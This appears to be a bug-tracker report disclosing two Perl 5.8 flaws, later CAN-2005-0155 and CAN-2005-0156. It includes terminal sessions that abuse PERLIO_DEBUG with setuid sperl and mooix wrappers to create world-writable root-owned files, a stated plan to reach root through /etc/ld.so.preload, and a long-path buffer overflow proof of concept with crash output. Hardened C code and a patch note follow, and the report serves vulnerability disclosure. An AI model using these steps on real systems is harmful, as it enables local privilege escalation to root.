Two perl issues:

    PERLIO_DEBUG
        If set to the name of a file or device then certain operations of
        PerlIO sub-system will be logged to that file (opened as append).
        Typical uses are UNIX:

./perlio.c:

    void
    PerlIO_debug(const char *fmt, ...)
    {
        ...
        if (!dbg) {
            char *s = PerlEnv_getenv("PERLIO_DEBUG");
            if (s && *s)
                dbg = PerlLIO_open3(s, O_WRONLY | O_CREAT | O_APPEND, 0666);
            else
                dbg = -1;
        }

If $ENV{'PERLIO_DEBUG'} is not set, PerlIO_debug() is a no-op. Else you can do the following either via sperl or via sperl:

sperl:

kfinisterre@jdam:~$ ls -al /usr/bin/sperl5.8.4
-rwsr-xr-x 1 root root 63808 2004-12-11 18:32 /usr/bin/sperl5.8.4
kfinisterre@jdam:~$ export PERLIO_DEBUG=/tmp/aaa
kfinisterre@jdam:~$ umask 001
kfinisterre@jdam:~$ /usr/bin/sperl5.8.4
sperl needs fd script
You should not call sperl directly; do you need to change a #! line from sperl to perl?
kfinisterre@jdam:~$ ls -al /tmp/aaa
-rw-rw-rw- 1 root kfinisterre 1403 2005-01-30 02:34 /tmp/aaa

setuid wrapper:

kfinisterre@jdam:/tmp$ ls -al /usr/sbin/mooix-pty-helper /usr/sbin/mooregister /usr/sbin/moopasswd
-rwsr-xr-x 1 root root 2872 2003-11-20 15:28 /usr/sbin/mooix-pty-helper
-rwsr-xr-x 1 root root 2832 2003-11-20 15:28 /usr/sbin/moopasswd
-rwsr-xr-x 1 root root 2836 2003-11-20 15:28 /usr/sbin/mooregister

These are all setuid programs that invoke perl scripts.

/usr/share/mooix/mooix-pty-helper.pl
/usr/share/mooix/moopasswd.pl
/usr/share/mooix/mooregister.pl

kfinisterre@jdam:/tmp$ umask 001
kfinisterre@jdam:/tmp$ export PERLIO_DEBUG=/tmp/oops2
kfinisterre@jdam:/tmp$ /usr/sbin/mooix-pty-helper
need a session dir at /usr/share/mooix/mooix-pty-helper.pl line 22, <CONFIG> line 98.
kfinisterre@jdam:/tmp$ ls -al /tmp/oops2
-rw-rw-rw- 1 root kfinisterre 30285 2005-01-30 02:23 /tmp/oops2
kfinisterre@jdam:/tmp$ tail /tmp/oops2 -n 3
/usr/share/mooix/mooix-pty-helper.pl:0 fd 0 refcnt=0
/usr/share/mooix/mooix-pty-helper.pl:0 fd 1 refcnt=0
/usr/share/mooix/mooix-pty-helper.pl:0 fd 2 refcnt=0
kfinisterre@jdam:/tmp$ echo + + > /tmp/oops2

hrmmm...

kfinisterre@jdam:~$ ls -al /etc/ld.so.preload
ls: /etc/ld.so.preload: No such file or directory

gonna try to write an ld.so.preload exploit without trashing my box. hehe. fun time.

Second issue:

While looking at the source code to figure out the details of my PERLIO_DEBUG file overwrite bug I also found a buffer overflow... in perlio.c:

    if (dbg > 0) {
        dTHX;
    #ifdef USE_ITHREADS
        /* Use fixed buffer as sv_catpvf etc. needs SVs */
        char buffer[1024];
        char *s;
        STRLEN len;
        s = CopFILE(PL_curcop);
        if (!s)
            s = "(none)";
        sprintf(buffer, "%s:%" IVdf " ", s, (IV) CopLINE(PL_curcop));

Set PERLIO_DEBUG to anything, make a perl script calling sperl and run it with the full path (after placing it in a long ass directory):

    #!/usr/bin/sperl5.8.4
    print a;

kfinisterre@jdam:/tmp$
/tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/test.pl
Segmentation fault

stat64("/usr/local/share/perl/5.8.0", 0xbfffd880) = -1 ENOENT (No such file or directory)
** eip[40175563] eax[ffffffda] ecx[00008441] edx[000001b6] ebx[080677ad] esp[bfffd294] ebp[bfffd2a8] esi[00008441] edi[40177d00]
open("/tmp/lala", O_WRONLY|O_APPEND|O_CREAT|O_LARGEFILE, 0666) = 3
** eip[4021898a] eax[00000000] ecx[08054e04] edx[bfffcd9c] ebx[402e95e0] esp[bfffcbc8] ebp[bfffcbe0] esi[41414141] edi[bfffcd9c]
--- SIGSEGV (Segmentation fault) @ 0 (0) ---
upeek: ptrace(PTRACE_PEEKUSER,2970,48,0): No such process
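Added illustration, not code from perl or from the reporter: a hardened variant of the two perlio.c spots quoted in the report above. It refuses to honour the environment variable when the real and effective ids differ (so a setuid wrapper never creates a root-owned file at a user-chosen path), opens the log without following symlinks and with a restrictive mode, and bounds the "file:line " prefix write with snprintf instead of sprintf. Function names are hypothetical and the checks are mine, not the upstream fix.

```c
/* Hypothetical hardened helpers; not perl's own code. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Issue 1: a privileged process must not act on a user-controlled log
 * path. Only when real and effective ids match may the caller consult
 * getenv("PERLIO_DEBUG") at all. */
int debug_log_allowed(uid_t uid, uid_t euid, gid_t gid, gid_t egid)
{
    return uid == euid && gid == egid;
}

/* Open the debug log only for an unprivileged process. O_NOFOLLOW stops
 * a symlink at the path from redirecting the append elsewhere, O_CLOEXEC
 * keeps the descriptor out of child processes, and 0600 (instead of the
 * original 0666) means the caller's umask no longer decides whether the
 * file ends up world-writable. Returns the fd, or -1 when refused. */
int open_debug_log(const char *path)
{
    if (path == NULL || *path == '\0')
        return -1;
    if (!debug_log_allowed(getuid(), geteuid(), getgid(), getegid()))
        return -1;
    return open(path, O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW | O_CLOEXEC,
                0600);
}

/* Issue 2: the original sprintf() writes "<file>:<line> " into a fixed
 * 1024-byte buffer with no length check, so a long script path overruns
 * the stack. snprintf() never writes past buflen; a prefix that did not
 * fit is reported with -1 so the caller can drop it rather than log a
 * silently truncated path. Returns 0 on success. */
int format_debug_prefix(char *buf, size_t buflen, const char *file,
                        unsigned long line)
{
    int n;

    if (file == NULL)
        file = "(none)";
    n = snprintf(buf, buflen, "%s:%lu ", file, line);
    if (n < 0 || (size_t)n >= buflen)
        return -1;
    return 0;
}
```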
Created attachment 50060
perl-5.8.6-bug33990.patch

Mandrake patch
CAN-2005-0155 for the privilege escalation in debug mode
CAN-2005-0156 for the buffer overflow
This is public now on #bug 80460.
*** This bug has been marked as a duplicate of 80460 ***